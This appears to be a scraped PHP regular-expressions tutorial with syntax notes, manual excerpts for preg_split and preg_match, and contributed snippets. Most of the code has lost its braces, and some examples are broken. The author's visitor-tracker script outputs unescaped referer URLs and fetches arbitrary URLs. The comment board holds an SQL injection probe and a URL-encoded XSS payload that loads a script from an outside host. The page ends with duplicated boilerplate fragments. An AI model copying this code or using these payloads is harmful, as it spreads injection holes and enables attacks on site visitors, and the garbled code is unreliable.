Regular Expressions Tutorial: Visit

Visit Mindful Musings Weblog Tools Collection Find Me
A Cure
Regular Expressions
Tutorial
I have searched the web far and near for a
good tutorial on PHP Regular Expressions
and I have come up with a multitude of sites.
However, I needed just a little bit of
information from each of the sites and I ended
up trying to move between 10 different
webpages to get the information I needed at a
particular time. This tutorial is a
collation of all those bits of information.
Some of this is my work, but it is mostly
good collection of other tutorials available
out there. In order to give authors credit
for their work, I have included ALL the links
of those pages and if anyone feels like
this is an outrage, let me know and I will
take down the relevant information.
So here goes...
Advertise Here
Basic Syntax of Regular
Expressions (as from
PHPBuilder.com)
First of all, let's take a look at two special
symbols: '^' and '$'. What they do is indicate
the
start and the end of a string, respectively,
like this:
"^The": matches any string that starts with

"The";
"of despair$": matches a string that ends in the
substring "of despair";
"^abc$": a string that starts and ends with
"abc" -- that could only be "abc" itself!
"notice": a string that has the text "notice" in
it.
You can see that if you don't use either of the
two characters we mentioned, as in the last
example,
you're saying that the pattern may occur
anywhere inside the string -- you're not
"hooking" it to any of the edges.
There are also the symbols '*', '+', and '?',

which denote the number of times a character or
a sequence of
characters may occur. What they mean is: "zero
or more", "one or more", and "zero or one." Here
are some examples:
"ab*": matches a string that has an a followed

by zero or more b's ("a", "ab", "abbb", etc.);
"ab+": same, but there's at least one b ("ab",
"abbb", etc.);
"ab?": there might be a b or not;
"a?b+$": a possible a followed by one or more
b's ending a string.
You can also use bounds, which come inside
braces and indicate ranges in the number of
occurences:
"ab{2}": matches a string that has an a followed
by exactly two b's ("abb");
"ab{2,}": there are at least two b's ("abb",
"abbbb", etc.);
"ab{3,5}": from three to five b's ("abbb",
"abbbb", or "abbbbb").
Note that you must always specify the first
number of a range (i.e, "{0,2}", not "{,2}").
Also, as you might
have noticed, the symbols '*', '+', and '?' have
the same effect as using the bounds "{0,}",
"{1,}", and "{0,1}",
respectively.
Now, to quantify a sequence of characters, put

them inside parentheses:
"a(bc)*": matches a string that has an a

followed by zero or more copies of the sequence
"bc";
"a(bc){1,5}": one through five copies of "bc."
There's also the '|' symbol, which works as an
OR operator:
"hi|hello": matches a string that has either
"hi" or "hello" in it;
"(b|cd)ef": a string that has either "bef" or
"cdef";
"(a|b)*c": a string that has a sequence of
alternating a's and b's ending in a c;
A period ('.') stands for any single character:
"a.[0-9]": matches a string that has an a

followed by one character and a digit;
"^.{3}$": a string with exactly 3 characters.
Bracket expressions specify which characters are
allowed in a single position of a string:
"[ab]": matches a string that has either an a or

a b (that's the same as "a|b");
"[a-d]": a string that has lowercase letters 'a'
through 'd' (that's equal to "a|b|c|d" and even
"[abcd]");
"^[a-zA-Z]": a string that starts with a letter;
"[0-9]%": a string that has a single digit
before a percent sign;
",[a-zA-Z0-9]$": a string that ends in a comma
followed by an alphanumeric character.
You can also list which characters you DON'T
want -- just use a '^' as the first symbol in a
bracket expression
(i.e., "%[^a-zA-Z]%" matches a string with a
character that is not a letter between two
percent signs).
In order to be taken literally, you must escape
the characters "^.[$()|*+?{\" with a backslash
('\'), as
they have special meaning. On top of that, you
must escape the backslash character itself in
PHP3 strings, so,
for instance, the regular expression "(\$|)[0-
9]+" would have the function call: ereg("(\\$|)
[0-9]+", $str)
(what string does that validate?)
Example 1. Examples of valid patterns
* /<\/\w+>/
* |(\d{3})-\d+|Sm
* /^(?i)php[34]/
* {^\s+(\s+)?$}
Example 2. Examples of invalid patterns
* /href='(.*)' - missing ending delimiter
* /\w+\s*\w+/J - unknown modifier 'J'
* 1-\d3-\d3-\d4| - missing starting delimiter

Some useful PHP Keywords and
their use (php.net man pages)
preg_split
(PHP 3>= 3.0.9, PHP 4 )

preg_split -- Split string by a regular
expression
Description
array preg_split ( string pattern, string
subject [, int limit [, int flags]])
Returns an array containing substrings of

subject split along boundaries matched by
pattern.
If limit is specified, then only substrings up

to limit are returned, and if limit is -1, it
actually means "no limit", which is useful for
specifying the flags.
flags can be any combination of the following

flags (combined with bitwise | operator):
PREG_SPLIT_NO_EMPTY
If this flag is set, only non-empty pieces
will be returned by preg_split().
PREG_SPLIT_DELIM_CAPTURE
If this flag is set, parenthesized
expression in the delimiter pattern will be
captured and
returned as well. This flag was added for
4.0.5.
PREG_SPLIT_OFFSET_CAPTURE
If this flag is set, for every occuring
match the appendant string offset will also be
returned. Note that this changes the return
value in an array where every element is an
array consisting of the matched string at
offset 0 and it's string offset into subject
at offset 1. This flag is available since PHP
4.3.0 .
Example 1. preg_split() example : Get the parts

of a search string
<?php
// split the phrase by any number of commas or
space characters,
// which include " ", \r, \t, \n and \f
$keywords = preg_split ("/[\s,]+/", "hypertext
language, programming");
?>
Example 2. Splitting a string into component

characters
<?php
$str = 'string';
$chars = preg_split('//', $str, -1,
PREG_SPLIT_NO_EMPTY);
print_r($chars);
?>
Example 3. Splitting a string into matches and

their offsets
<?php
$str = 'hypertext language programming';
$chars = preg_split('/ /', $str, -1,
PREG_SPLIT_OFFSET_CAPTURE);
print_r($chars);
?>
will yield:
Array
(
[0] => Array
(
[0] => hypertext
[1] => 0
)
[1] => Array

(
[0] => language
[1] => 10
)
[2] => Array

(
[0] => programming
[1] => 19
)
Note: Parameter flags was added in PHP 4

Beta 3.
preg_match
(PHP 3>= 3.0.9, PHP 4 )

preg_match -- Perform a regular expression match
Description
int preg_match ( string pattern, string subject
[, array matches [, int flags]])
Searches subject for a match to the regular

expression given in pattern.
If matches is provided, then it is filled with

the results of search. $matches[0] will
contain the text that matched the full pattern,
$matches[1] will have the text that matched
the first captured parenthesized subpattern,
and so on.
flags can be the following flag:
PREG_OFFSET_CAPTURE
If this flag is set, for every occuring
match the appendant string offset will also
be returned. Note that this changes the
return value in an array where every element
is an array consisting of the matched string
at offset 0 and it's string offset into
subject at offset 1. This flag is available
since PHP 4.3.0 .
The flags parameter is available since PHP 4.3.0

.
preg_match() returns the number of times pattern

matches. That will be either 0 times
(no match) or 1 time because preg_match()
will stop searching after the first match.
preg_match_all() on the contrary will continue
until it reaches the end of subject.
preg_match() returns FALSE if an error occured.
Tip: Do not use preg_match() if you only

want to check if one string is contained
in another string. Use strpos() or strstr()
instead as they will be faster.
Example 1. Find the string of text "php"
<?php
// The "i" after the pattern delimiter indicates
a case-insensitive search
if (preg_match ("/php/i", "PHP is the web
scripting language of choice.")) {
print "A match was found.";
} else {
print "A match was not found.";
}
?>
Example 2. Find the word "web"
<?php
/* The \b in the pattern indicates a word
boundary, so only the distinct
* word "web" is matched, and not a word partial
like "webbing" or "cobweb" */
if (preg_match ("/\bweb\b/i", "PHP is the web
scripting language of choice.")) {
} else {
}
if (preg_match ("/\bweb\b/i", "PHP is the

website scripting language of choice.")) {
} else {
}
?>
Example 3. Getting the domain

name out of a URL
<?php
// get host name from URL
preg_match("/^(http:\/\/)?([^\/]+)/i",
"http://www.php.net/index.html", $matches);
$host = $matches[2];
// get last two segments of host name

preg_match("/[^\.\/]+\.[^\.\/]+$/", $host,
$matches);
echo "domain name is: {$matches[0]}\n";
?>
This example will produce:
domain name is: php.net
Perl Style Delimiters (as from
crazygrrl.com)
When using Perl-style matching, the pattern also
has to be enclosed by special delimiters.
The default is the forward slash, though you can
use others. For example:
/colou?r/
Usually you'll want to stick with the default,

but if you need to use the
forward slash a lot in the actual pattern

(especially if you're dealing with
pathnames) you might want to use something else:
!/root/home/random!
To make a match case-insensitive, all you need

to do is append the option
i to the pattern:
/colou?r/i
Perl-style functions support these extra

metacharacters (this is not a full
list):
\b A word boundary, the spot between word (\w)

and non-word (\W) characters.
\B A non-word boundary.
\d A single digit character.
\D A single non-digit character.
\n The newline character. (ASCII 10)
\r The carriage return character. (ASCII

13)
\s A single whitespace character.
\S A single non-whitespace character.
\t The tab character. (ASCII 9)
\w A single word character - alphanumeric

and underscore.
\W A single non-word character.
Example:
/\bhomer\b/
Have a donut, Homer no match
A tale of homeric proportions! no match
Do you think he can hit a homer? match

Corresponding to ereg() is preg_match(). Syntax:
preg_match(pattern (string), target

(string), optional_array);
Example:
$pattern = "/\b(do(ugh)?nut)\b.*\b(Homer|
Fred)\b/i";
$target = "Have a donut, Homer.";
if (preg_match($pattern, $target, $matches)) {
print("Match: $reg[0]");
print("Pastry: $reg[1]");
print("Variant: $reg[2]");
print("Name: $reg[3]");
else {
print("No match.");
Results:
Match: donut, Homer
Pastry: donut
Variant: [blank because there was no "ugh"]
Name: Homer
If you use the $target "Doughnut,

Frederick?" there will be no match,
since there has to be a word boundary after

Fred.
but "Doughnut, fred?" will match since we've

specified it to be
case-insensitive.
Contributed code which is applicable (and very

useful!)
mkr at binarywerks dot dk
A (AFAIK) correct implementation of Ipv4

validation, this one supports optional ranges
(CIDR notation) and it validates numbers from 0-
255 only in the address part, and 1-32
only after the /
<?
function valid_ipv4($ip_addr)
$num="([0-9]|1?\d\d|2[0-4]\d|25[0-5])";
$range="([1-9]|1\d|2\d|3[0-2])";
if(preg_match("/^$num\.$num\.$num\.
$num(\/$range)?$/",$ip_addr))
return 1;
}
return 0;
$ip_array[] = "127.0.0.1";
$ip_array[] = "127.0.0.256";
$ip_array[] = "127.0.0.1/36";
$ip_array[] = "127.0.0.1/1";
foreach ($ip_array as $ip_addr)
if(valid_ipv4($ip_addr))
echo "$ip_addr is valid \n";
else
{
echo "$ip_addr is NOT
valid \n";
?>
plenque at hotmail dot com
I wrote a function that checks if a given

regular expression is valid. I think some of
you might find it useful. It changes the

error_handler and restores it, I didn't find
any other way to do it.
Function IsRegExp ($sREGEXP)
$sPREVIOUSHANDLER = Set_Error_Handler
("TrapError");
Preg_Match ($sREGEXP, "");
Restore_Error_Handler ($sPREVIOUSHANDLER);
Return !TrapError ();
Function TrapError ()
Static $iERRORES;
If (!Func_Num_Args ())
$iRETORNO = $iERRORES;
$iERRORES = 0;
Return $iRETORNO;
Else
{
$iERRORES++;
PHP Get_title tag code which uses simple regex

and nice php string functions
(As from Zend PHP)
<?php
function get_title_tag($chaine){
$fp = fopen ($chaine, 'r');
while (! feof ($fp)){
$contenu .= fgets ($fp, 1024);
if (stristr($contenu, '<\title>' )){
break;
}
if (eregi("", $contenu, $out)) {
return $out[1];
else{
return false;
?>
My Own 'Visitor Trac' code which uses regex XML

parsing methods
<?php
$referer = $_SERVER['HTTP_REFERER'];
$filename = $_SERVER[REMOTE_ADDR] . '.txt';

//print_r($_SERVER);
if (file_exists($filename)){
$lastvisit = filectime($filename);
$currentdate = date('U');
$difference = round(($currentdate -
$lastvisit)/84600);
if ($difference > 7) {
unlink($filename);
$fp = fopen($filename, "a");
else $fp = fopen($filename, "a");
else $fp = fopen($filename, "a");
if (!$_SERVER['HTTP_REFERER']) $url_test =
'http://dinki.mine.nu/weblog/';
else $url_test = $_SERVER['HTTP_REFERER'];
$new_title = return_title ($url_test);

//print $new_title;
$new_name = stripslashes("<beg>$new_title\n");
$new_URL = stripslashes("<beg>$referer\n");
fwrite($fp,$new_URL);
fwrite($fp,$new_name);
fclose($fp);
$fp = fopen($filename, "r");
$file = implode('', file ($filename));
$foo = preg_split("/<beg>/",$file);
$number = count($foo);
//print $number;
if ($number > 11) {
fclose($fp);
$fp = fopen($filename, "w");
$count = $number - 10;

while ($count < $number) {
$print1 = $foo[$count];
$print2 = $foo[$count+1];
print " <img src = arrow.gif> ";
print "<a
href=$print1>$print2</a>"; //print $count;
$count += 2;
$new_name =
stripslashes("<beg>$print2");
$new_URL =
stripslashes("<beg>$print1");
fwrite($fp,$new_URL);
fwrite($fp,$new_name);
fclose($fp);
//print_r($foo);
else {
$count = 1;
while ($count <= $number) {
$print1 = $foo[$count];
$print2 = $foo[$count+1];
print " <img src = arrow.gif> ";
print "<a
href=$print1>$print2</a>"; //print $count;
$count += 2;
fclose($fp);
function return_title($url) {
print $filename." ".$difference;
$array = file ($url);
for ($i = 0; $i < count($array); $i+

+)
{
if
(preg_match("/<title>(.*)<\/title>/i",
$array[$i], $tag_contents)) {
$title =
$tag_contents[1];
$title =
strip_tags($title);
return $title;
?>
Good online articles as

reference or extra
reading
O'Rielly Pocket Reference - PHP Regular
Expressions
A very nice article on PHP Regular
Expressions from DevArticle.com
A good run down of PHP-Regular expressions
with emphasis on code
Regular Expression Creator and Editor from
the makers of PHPEdit
Regular Expressions Library (with over 430
expressions and growing!!)
35236
[return] or Visit Mindful Musings Weblog Tools Collection Find Me A

Cure
Message Board
Post a Message
page 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
wdw 11 Apr 2013

wdwd
zrqbgtazr 14 Mar 2013

aqrtbazrtb
Nice Tutorial 20 Nov 2012

Thanks Dear for such a simple and easy to understand tutorial
nice info 23 Sep 2012

thanks for posting. you do need some CSS STYLING. your site is hard to read
bookmarking submission 20 Sep 2012

BIqopy Great, thanks for sharing this article post.Much thanks again.
cheap bookmarking service 20 Sep 2012

Ro04d8 Really informative blog article.Really looking forward to read more. Much
obliged.
Social Network Submissions 9 Jul 2012

uqb3qS Thanks a lot for the post.Thanks Again. Great.
test 19 Jun 2012

a'"\'\" WHERE 1=1 AND
test 19 Jun 2012
Salut ma poule %3C%53%43%52%49%50%54%20%53%52%43%3D
%68%74%74%70%3A%2F%2F%68%61%2E%63%6B%65%72%73%2E%6F
%72%67%2F%78%73%73%2E%6A%73%3E%3C%2F
%53%43%52%49%50%54%3E
Wow What a Tutorial 14 May 2012

HI Friend, This tutorial is really very nice. This is good starting point for me in
regular expressions. Thanks a lot & Keep it up Vakeel Ahmad
Hello 13 May 2012

Test Message
hello 26 Apr 2012

my name is teddy and i'm a drugy
test@testemail.com 10 Apr 2012

test@testemail.com
i like this 10 Apr 2012

hey i need a ride to the party
page 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1

Regular Expressions Tutorial: Visit

Uploaded by

Document Informationclick to expand document information

Copyright:

Available Formats

Regular Expressions Tutorial: Visit

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Regular Expressions Tutorial: Visit

Uploaded by

Copyright:

Available Formats

Visit Mindful Musings Weblog Tools Collection Find Me

Basic Syntax of Regular

Expressions (as from

"^The": matches any string that starts with

There are also the symbols '*', '+', and '?',

"ab*": matches a string that has an a followed

Now, to quantify a sequence of characters, put

"a(bc)*": matches a string that has an a

"a.[0-9]": matches a string that has an a

"[ab]": matches a string that has either an a or

Example 1. Examples of valid patterns

Example 2. Examples of invalid patterns

* /href='(.*)' - missing ending delimiter

* /\w+\s*\w+/J - unknown modifier 'J'

* 1-\d3-\d3-\d4| - missing starting delimiter

their use (php.net man pages)

(PHP 3>= 3.0.9, PHP 4 )

Returns an array containing substrings of

If limit is specified, then only substrings up

flags can be any combination of the following

Example 1. preg_split() example : Get the parts

Example 2. Splitting a string into component

Example 3. Splitting a string into matches and

[1] => Array

[2] => Array

Note: Parameter flags was added in PHP 4

(PHP 3>= 3.0.9, PHP 4 )

Searches subject for a match to the regular

If matches is provided, then it is filled with

flags can be the following flag:

The flags parameter is available since PHP 4.3.0

preg_match() returns the number of times pattern

Tip: Do not use preg_match() if you only

<strong>Example 2.</strong> Find the word "web"

if (preg_match ("/\bweb\b/i", "PHP is the

<strong>Example 3.</strong> Getting the domain

// get last two segments of host name

This example will produce:

domain name is: php.net

Perl Style Delimiters (as from

Usually you'll want to stick with the default,

forward slash a lot in the actual pattern

pathnames) you might want to use something else:

To make a match case-insensitive, all you need

Perl-style functions support these extra

\b A word boundary, the spot between word (\w)

\d A single digit character.

\D A single non-digit character.

\n The newline character. (ASCII 10)

\r The carriage return character. (ASCII

\s A single whitespace character.

\S A single non-whitespace character.

\t The tab character. (ASCII 9)

\w A single word character - alphanumeric

\W A single non-word character.

Have a donut, Homer no match

A tale of homeric proportions! no match